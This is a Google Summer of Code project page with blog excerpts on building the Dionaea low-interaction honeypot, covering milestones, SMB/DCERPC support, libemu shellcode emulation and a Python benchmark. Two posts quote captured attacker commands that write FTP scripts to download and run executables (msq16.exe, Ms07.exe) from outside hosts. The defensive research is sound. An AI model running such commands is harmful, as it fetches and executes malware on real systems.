GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots

Nepenthes is one of the leading low-interaction honeypots designed to automate the capture and analysis of malware, and this project will be a next generation development of low interaction server honeypots able to automatically and scalably detect known and unknown malware.

Mentor: Paul Baecher
Student: Markus Koetter
Deliverables:

  • low interaction honeypot
  • supporting ipv4, ipv6 and unix domain sockets
  • supporting tcp, udp and ssl/tls to serve and connect services
  • interfacing p0f to fingerprint incoming connections
  • embedding python to allow writing service protocols in a scripting language
  • using libemu to detect and emulate shellcode
  • downloading malware via the most common protocols

Timelines:
23.05.2009

  • start

16.06.2009

  • automake buildsystem works with library checks
  • networking core functionality works (tcp,udp,ssl,un)
  • privileged child works
  • fingerprinting incoming connections via p0f works
  • module loading works
  • events work
  • logging works

A simple protocol which can be connected using netcat or openssl s_client via ipv4/6 proves these claims16.07.2009

  • python interface exists
  • provides a cli
  • can access the networking core
  • can emit and receive events
  • can load python scripts
  • examples how to use the scripting interface
  • required parts of the protocol for an exploit taken from a public repository is implemented in python

A simple protocol written in python which can be connected using netcat or openssl s_client via ipv4/6 is provided to proof the claims10.08.2009

  • thread-pool works
  • stream recording works
  • shellcode detection using libemu works
  • shellcode emulation using libemu works
  • compiles on linux&openbsd

An exploit taken from a public repository, run against the software, is detected and emulated.24.08.2009

  • documentation improvements, homepage documents how to install and use the software

 
 

Iteolih: RPC vulnerability implementation party

The Dionaea honeypot got more and more mature during the last weeks. As Markus blogged in Iteolih: Miles and More the software is now able to detect shellcode via libemu and generates a nice shellcode profile out of this.

The SMB / DCERPC implementation also got fairly mature and is now able to cope with all packet types and also most caveats and differences of implementations in exploits. As I registered more and more RPC vulnerabilities in the module, it was definitely time to give libemu something to eat! :)

Iteolih: Miles and More

We got a new milestone due:
10.08.2009

  • thread-pool works
  • stream recording works
  • shellcode detection using libemu works
  • shellcode emulation using libemu works
  • compiles on linux&openbsd

An exploit taken from a public repository, run against the software, is detected and emulated.
To shorten things, basically all required points are hit with current svn.
So, given the time we just saved, some words about how it works.

Iteolih: malicious ftp services

Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this:

WinExec("cmd /c echo open 78.1.96.200 4871 > o&echo user 1 1 >> o &echo get msq16.exe >> o")
ExitThread(0)

As the required part to download the malware to the remotehost was incomplete, I got curious and wanted a copy.

Iteolih: If you can't touch it ...

While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.

cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo user ik ik >> i &echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe

Iteolih: SMB/RPC efforts

During the last weeks I have been working on SMB and specifically DCERPC support for the Dionaea next generation low-interaction honeypot (buzz!).

SMB / CIFS is a huge protocol with several protocol versions and a lot of message types. The CIFS technical reference and the Implementing CIFS book have been constant companions for me since the beginning of the project.

Iteolih: Is this worth your time?

Hello,
due to the length of the whole term Improving the effectiveness of low interaction honeypots, I decided to use Iteolih as uniq abbrevitation. Things are rolling for the project, writing code started, a basic homepage with instructions how to compile/use it was created.
I even had the plan to write about it once or twice, finish something in the code, write about it. When I was done with the code, I got the idea, writing about it was not worth your time.

Iteolih: Python Benchmark

As the plan is to embedd python as scripting language into the honeypot, I ran a benchmark on a testsuite. The 'testsuite' is a c core which accepts connections, and allows python to deal with the input. The protocol used for benchmarking is http, the service serves a non static html page.
I tested

  • 2.6.2_(release26-maint,_Apr_19_2009,_02:15:38)
  • 3.0.1+_(r301:69556,_Apr_15_2009,_17:22:45)_
  • 3.1a1+_(py3k,_Mar_30_2009,_02:02:26)_

To benchmark, I ran the apache benchmark tool ab

Syndicate content